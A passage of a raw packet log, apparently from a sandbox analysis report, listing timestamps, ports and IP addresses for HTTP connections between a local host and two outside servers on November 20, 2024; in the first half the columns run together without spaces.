                                                                    Nov 20, 2024 07:56:45.794477940 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794481993 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794497967 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794500113 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794516087 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794532061 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794569016 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.797895908 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797908068 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797928095 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797938108 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797947884 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797959089 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.797962904 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797975063 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797983885 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798008919 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798023939 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798033953 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798048019 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798059940 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798068047 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798073053 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798084021 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798085928 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798100948 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798101902 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798110962 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965428114 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965437889 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965440035 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965456009 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965456963 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965473890 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965475082 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965490103 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965495110 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965502977 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965511084 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965517044 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965528965 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965531111 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965547085 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965549946 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965559959 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965564966 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965570927 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965581894 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965600014 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965601921 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965611935 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965616941 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965622902 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965632915 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965643883 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965650082 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965662003 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965670109 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965673923 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965681076 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965691090 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965693951 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965704918 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965706110 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965715885 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965727091 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965730906 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965744019 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965744972 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965756893 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965764046 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965770006 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965785027 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965789080 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965802908 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965806961 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965817928 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965820074 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965827942 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965840101 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965842962 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965854883 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965857029 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965868950 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965893984 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965924978 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965939045 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965939045 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965950012 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965958118 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965960026 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965976000 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.965981960 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.965992928 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966006994 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966011047 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966017008 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966027975 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966036081 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966042042 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966053009 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966054916 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966068983 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966074944 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966088057 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966104984 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966110945 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966154099 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966167927 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966187000 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966202021 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966249943 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966270924 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966289997 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966303110 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966310978 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966320038 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966322899 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966336012 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966332912 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966348886 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966351986 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966363907 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966368914 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966373920 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966382980 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966383934 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966398001 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966403008 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966417074 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966439009 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966439009 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966449976 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966463089 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966470003 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966479063 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966486931 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966491938 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966506004 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966506958 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966519117 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966519117 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966535091 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966552019 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966661930 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966703892 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966720104 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966732979 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966739893 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966744900 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966756105 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966758013 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966769934 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966773033 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966780901 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966788054 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966795921 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966804981 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966809034 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966820955 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966824055 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966839075 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966841936 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966851950 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966854095 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966865063 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966872931 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966876984 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966891050 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966893911 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966907978 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966909885 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966919899 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966926098 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966936111 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966941118 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966958046 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966973066 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.966975927 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966988087 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.966996908 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967001915 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967011929 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967021942 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967039108 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967091084 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967094898 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967112064 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967124939 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967128038 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967137098 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967143059 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967153072 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967159986 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967175007 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967190981 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967201948 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967206001 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967211962 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967226028 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967231989 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967236042 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967247009 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967247963 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967261076 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.967266083 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967282057 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967295885 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.967331886 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:46.027055979 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.027076006 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.027089119 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.027131081 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.027146101 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.027172089 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.027179003 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:46.027183056 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.027189016 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.027236938 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:46.027251005 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:46.051306009 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.051393986 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:46.051412106 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.051424980 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.051440954 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.051450968 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.051457882 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:46.051465988 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.051479101 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.051481009 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:46.051481009 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:46.051491976 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:46.051500082 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:46.051508904 CET4916780192.168.2.22192.3.243.136
Nov 20, 2024 07:56:46.051512003 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051527023 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051528931 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051538944 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051544905 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051553011 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051563025 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051565886 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051573038 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051575899 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051588058 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051594973 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051606894 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051606894 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051625967 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051637888 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051670074 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051680088 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051691055 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051704884 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051716089 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051723957 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051729918 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051733017 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051743984 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051752090 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051757097 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051767111 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051772118 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051775932 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051785946 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051795959 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051800966 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:46.051803112 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051821947 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051835060 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:46.051896095 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:50.449640036 CET  80  49167  192.3.243.136  192.168.2.22
Nov 20, 2024 07:56:50.449723005 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:57.235893965 CET  49168  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:57.240766048 CET  80  49168  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:57.240823984 CET  49168  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:57.243405104 CET  49168  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:57.248220921 CET  80  49168  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:57.248279095 CET  49168  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:57.253175974 CET  80  49168  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:57.988333941 CET  80  49168  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:57.988471985 CET  49168  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:57.988603115 CET  80  49168  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:57.988645077 CET  49168  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:57.993383884 CET  80  49168  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:59.147783995 CET  49169  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:59.154687881 CET  80  49169  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:59.154763937 CET  49169  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:59.157105923 CET  49169  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:59.162000895 CET  80  49169  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:59.162066936 CET  49169  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:59.166934967 CET  80  49169  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:59.394629002 CET  49167  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:56:59.882088900 CET  80  49169  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:59.882200003 CET  49169  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:59.882250071 CET  80  49169  94.156.177.41  192.168.2.22
Nov 20, 2024 07:56:59.882508039 CET  49169  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:56:59.887005091 CET  80  49169  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:00.025521040 CET  49170  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.030431986 CET  80  49170  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:00.030519009 CET  49170  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.033211946 CET  49170  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.038021088 CET  80  49170  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:00.038068056 CET  49170  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.042897940 CET  80  49170  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:00.796703100 CET  80  49170  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:00.796768904 CET  80  49170  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:00.796819925 CET  49170  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.796866894 CET  49170  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.801702023 CET  80  49170  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:00.973134041 CET  49171  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.978013992 CET  80  49171  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:00.978075981 CET  49171  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.981055975 CET  49171  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.985872984 CET  80  49171  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:00.985980988 CET  49171  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:00.990745068 CET  80  49171  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:01.712006092 CET  80  49171  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:01.712249994 CET  49171  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:01.712344885 CET  80  49171  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:01.712397099 CET  49171  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:01.717775106 CET  80  49171  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:01.977744102 CET  49172  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:01.982661009 CET  80  49172  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:01.982767105 CET  49172  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:01.985131025 CET  49172  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:01.990040064 CET  80  49172  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:01.990103006 CET  49172  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:01.995042086 CET  80  49172  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:02.731832027 CET  80  49172  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:02.731868982 CET  80  49172  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:02.731919050 CET  49172  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:02.762367964 CET  49172  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:02.767335892 CET  80  49172  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:03.015268087 CET  49173  80  192.168.2.22  94.156.177.41
